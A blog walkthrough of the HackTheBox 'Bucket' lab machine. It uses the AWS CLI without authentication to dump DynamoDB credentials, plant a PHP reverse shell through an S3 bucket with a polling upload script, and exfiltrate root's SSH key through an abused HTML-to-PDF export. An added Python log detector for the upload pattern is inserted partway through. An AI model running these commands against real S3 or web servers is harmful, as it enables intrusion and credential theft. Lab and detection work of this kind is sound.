
Hackthebox Bucket writeup

Introduction

Name: Bucket
IP: 10.10.10.212
Points: 30
OS: Linux
Difficulty: Medium
Creator: MrR3boot
Out On: 17 Oct 2020

Summary

  • Nmap shows 2 ports open.
  • Enumerating the web server
  • Finding a directory called /shell
  • Using the AWS CLI to upload a shell
  • And we get a shell
  • Grab user.txt
  • We find a service running on port 4566
  • Port forward it to reach an internal web server and get code execution as root.
  • Creating the alerts table
  • Insert the payload.
  • Trigger the payload and create a PDF file
  • Getting root's id_rsa and then SSH in.
  • Grab root.txt


Recon

Nmap


┌─[root@d3dsec]─[~/Desktop/HTB/Bucket]
└──╼ #cat nmap/result.nmap 
# Nmap 7.80 scan initiated Sun Sep 27 08:19:05 2020 as: nmap -sC -sV -oA /result 10.10.10.212
Nmap scan report for 10.10.10.212
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE  VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.32 seconds

So basically two ports are open: 22 (ssh) and 80 (http).

We find the domain bucket.htb in the nmap result. Let's first add it to our /etc/hosts file.

Port-80


There is a simple Bucket Advertising Platform.


Let's view the source code.


We see a new domain; let's add it to our hosts file as well and go to that page.


It says running.

Let's use Gobuster to find something new.


┌─[root@d3dsec]─[~/Desktop/HTB/Bucket]
└──╼ #gobuster dir -u http://s3.bucket.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://s3.bucket.htb/
[+] Threads:        50
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/29 17:47:50 Starting gobuster
===============================================================
/health (Status: 200)
/shell (Status: 200)

We find a /shell directory; it's something new, so let's check it out.


It's a DynamoDB web shell. We can run commands there too, but I prefer to run them from the CLI.

Let's configure our AWS CLI.

But first, install the AWS CLI.


sudo apt-get install awscli

Now let's configure it for our use.


aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json

Now our setup is complete. Let's list the tables in the DynamoDB database.


aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request


There is only one table: users.

Let's list its contents.


aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request



{
    "Items": [
        {
            "password": {
                "S": "Management@#1@#"
            },
            "username": {
                "S": "Mgmt"
            }
        },
        {
            "password": {
                "S": "Welcome123!"
            },
            "username": {
                "S": "Cloudadm"
            }
        },
        {
            "password": {
                "S": "n2vM-<_K_Q:.Aa2"
            },
            "username": {
                "S": "Sysadm"
            }
        }
    ],
    "Count": 3,
    "ScannedCount": 3,
    "ConsumedCapacity": null
}

We got some creds.

I tried these to get SSH, but nothing worked.

We also found a web server on http://s3.bucket.htb that says running.

Let's try to enumerate and list the Buckets on that.


aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request


There is one bucket called adserver.

I think this bucket is connected to the http://bucket.htb page.

Let's list the contents of the adserver bucket.


aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver


It dumps all the files in the adserver bucket.

Hmm, let's try to put our simple PHP reverse shell in there.


aws --endpoint-url http://s3.bucket.htb/ s3 cp /root/Desktop/HTB/Bucket/shell.php s3://adserver/images/shell.php


Let's list the files again to double-check whether our reverse shell is available in the adserver bucket.


aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver


Boom, our shell.php was successfully inserted inside the images directory.

Let's do a curl request to that directory and see whether our reverse shell is working.

Important: I used this method again, so my shell is named shell1.php; in your case the shell name is shell.php.

After running this command, start your netcat listener on the port you set in your reverse shell.


curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell1.php


It says 404 not found.

Hmm, I think a cron job is involved, so we need to be quick to get a reverse shell.

I created a script to automate the curl request; let's use this.


resp=404    # initialise so the loop runs at least once
while [[ $resp -eq 404 ]]; do
    resp=$(curl --write-out "%{http_code}\n" --silent --output /dev/null http://bucket.htb/images/shell1.php)
    echo "$resp"
    sleep 0.1
done

I did the same steps again but still didn't get the reverse shell.

Let's automate the upload and the check so they run together.

I wrote a script to automate the process.


#!/bin/bash
# Upload the PHP reverse shell to the adserver bucket, then poll the web root
# until the sync job has copied it there; the first non-404 curl executes it.

export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

echo "List files."
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver

## Copy file to bucket
aws --endpoint-url http://s3.bucket.htb/ s3 cp /root/Desktop/HTB/Bucket/shell.php s3://adserver/images/shell1.php

echo "Check if file is uploaded"
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver

# Check if the file exists on the S3 endpoint
echo "Checking on s3.bucket"
curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell1.php

# Poll the web root until the sync job has copied the file (404 until then)
resp=404
while [[ $resp -eq 404 ]]; do
    resp=$(curl --write-out "%{http_code}\n" --silent --output /dev/null http://bucket.htb/images/shell1.php)
    echo "$resp"
    sleep 0.1
done

I named the script dedsec.sh; choose whatever name you wish.

Now the only work left is to start your listener and get a sweet reverse shell.

Important: you may have to run this script two or three times to get a reverse shell.
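From a defender's point of view, the chain above (an anonymous PUT of a .php file into the adserver bucket, a polling loop that gets 404s until the sync job copies the file into the web root, then the GET that runs it) leaves a distinctive trace in the web server logs. The following Python is an added example, not code from the original writeup; the log lines are constructed, and it assumes the S3 endpoint and the bucket.htb vhost both log to one file in Apache combined format.

```python
import re

# Constructed sample Apache access-log lines (not from the original post). They
# mimic the sequence in the writeup: a PUT to the S3 endpoint, polling GETs
# that 404 until the sync runs, then the GET that executes the uploaded file.
SAMPLE_LOG = """\
10.10.14.5 - - [29/Oct/2020:17:52:01 +0000] "PUT /adserver/images/shell1.php HTTP/1.1" 200 0 "-" "aws-cli/1.18.69"
10.10.14.5 - - [29/Oct/2020:17:52:02 +0000] "GET /images/shell1.php HTTP/1.1" 404 275 "-" "curl/7.72.0"
10.10.14.5 - - [29/Oct/2020:17:52:40 +0000] "GET /images/shell1.php HTTP/1.1" 200 0 "-" "curl/7.72.0"
10.10.14.7 - - [29/Oct/2020:17:53:10 +0000] "GET /images/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.10.14.5 - - [29/Oct/2020:17:53:11 +0000] "PUT /adserver/images/banner.jpg HTTP/1.1" 200 0 "-" "aws-cli/1.18.69"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
EXEC_EXT = (".php", ".phtml", ".phar", ".php3", ".php5")
WATCHED_PREFIXES = ("/adserver/", "/images/")   # bucket path and its synced web path


def classify(line):
    """Return a finding dict for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?", 1)[0].lower()
    if not (path.startswith(WATCHED_PREFIXES) and path.endswith(EXEC_EXT)):
        return None
    if m["method"] in ("PUT", "POST"):
        reason = "executable file written to bucket path"
    elif m["method"] == "GET" and m["status"] == "200":
        reason = "executable file served from synced web path"
    else:
        reason = "probe for executable file"          # e.g. the 404 polling loop
    return {"ip": m["ip"], "method": m["method"], "path": m["path"],
            "status": int(m["status"]), "reason": reason}


def find_suspicious(lines):
    """Apply classify() to every line and keep only the findings."""
    return [f for f in (classify(line) for line in lines) if f]


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG.splitlines()):
        print(finding)
```

Run against the sample it reports the PUT, the 404 probe and the successful GET, and ignores the image files; on a real box the same rule is a good candidate for an alert on the Apache logs or the S3 access logs.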


Boom we got the reverse shell.

Let's check the /etc/passwd file to learn about the users on the machine.


There is one user named roy; let's try the passwords we found on Bucket.


Boom, we get user privileges; now grab your user.txt.

Privilege escalation

Before we start privilege escalation, let's do one thing: copy our SSH public key into roy's .ssh folder so we get an SSH connection, which is better than a netcat shell.


Now let's ssh in and get our beautiful ssh connection.


After some enumeration I find an interesting directory called bucket-app.


Let's cat index.php and check what this file does.


The index.php shows another communication with the internal service: a new table named alerts, which is accessed with a POST request, and whose data values are used to create a PDF.

Link : HTML to PDF converter for Java and .NET

We will abuse this to get root id_rsa file.

Step 1

First things first, we need to port forward port 8000. The aws CLI is installed on the system, and there are internal services on port 8000 (web service) and port 4566 (aws service).


ssh -L 8000:127.0.0.1:8000 roy@10.10.10.212


Let's cross-check that the port is forwarded: open your browser and type 127.0.0.1:8000; if it shows the web server, your port is successfully forwarded.


Step 2

Create a new DynamoDB table.

Use this command inside the machine.


/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566


Step 3

Insert into the table the values that index.php requests.


Step 4

Now we only need to do a curl req.


curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v


Step 5

Now open your browser and go to 127.0.0.1:8000/files/


There is a result.pdf; open it.


Click on the pin icon and download root's id_rsa.


But I want to download it from my terminal so the file is organised in my Bucket directory.



chmod 600 id_rsa
ssh -i id_rsa root@10.10.10.212

I will give you root's id_rsa in case you need a backup plan.



Now the only step missing is root.txt. Let's grab it.


And we pwned it.

If you liked the writeup, support a student to get the OSCP cert: Donation for OSCP.

Resources

HTML to PDF converter for Java and .NET: https://pd4ml.com/cookbook/pdf-attachments.htm
This post is licensed under CC BY 4.0


© 2020 Dedinfosec. All rights reserved.